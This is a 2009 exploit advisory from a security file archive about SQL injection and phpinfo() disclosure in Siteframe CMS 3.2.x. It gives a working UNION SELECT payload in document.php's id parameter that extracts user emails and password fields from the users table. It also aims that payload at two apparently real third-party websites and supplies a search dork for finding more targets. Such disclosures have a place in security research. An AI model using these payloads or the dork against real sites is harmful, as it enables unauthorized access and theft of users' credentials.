Siteframe CMS 3.2.x SQL Injection / Disclosure

Siteframe CMS 3.2.x SQL Injection / Disclosure: Posted Jul 8, 2009; Authored by NoGe; Siteframe CMS version 3.2.x suffers from remote SQL injection and phpinfo() disclosure vulnerabilities.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | f2278afaa562c161f135fa6821b8c23e04a00da98e05eece4152d3402ff5aba3; Download | Favorite | View

Siteframe CMS 3.2.x SQL Injection / Disclosure


========================================================================================================================================================


  [o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

       Software : Siteframe CMS version 3.2.x
       Vendor   : http://siteframe.org/
       Download : http://sitefrane.org/downloads/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


========================================================================================================================================================


  [o] Description

       Siteframe™ is a lightweight content-management system
       designed for the rapid deployment of community-based websites.
       With Siteframe, a group of users can share stories and photographs,
       create blogs, send email to one another, and participate in group activities.
       Siteframe enables this by providing web-based content management
       so that anyone can create content without needing to learn HTML.



  [o] Vulnerable file

       document.php



  [o] Exploit

       http://localhost/[path]/document.php?id=[SQL]
       http://localhost/[path]/phpinfo.php



  [o] Proof of concept

       http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
       http://digi-forum.com/frame/phpinfo.php
       http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
       http://myolympus.org/phpinfo.php



  [o] Dork

       "Powered by Siteframe"



  [o] Notes

       Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)


========================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa Angela Zhang
       H312Y yooogy mousekill }^-^{ kaka11 zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


========================================================================================================================================================

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Siteframe CMS 3.2.x SQL Injection / Disclosure

Siteframe CMS 3.2.x SQL Injection / Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Siteframe CMS 3.2.x SQL Injection / Disclosure

Share This

Siteframe CMS 3.2.x SQL Injection / Disclosure

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems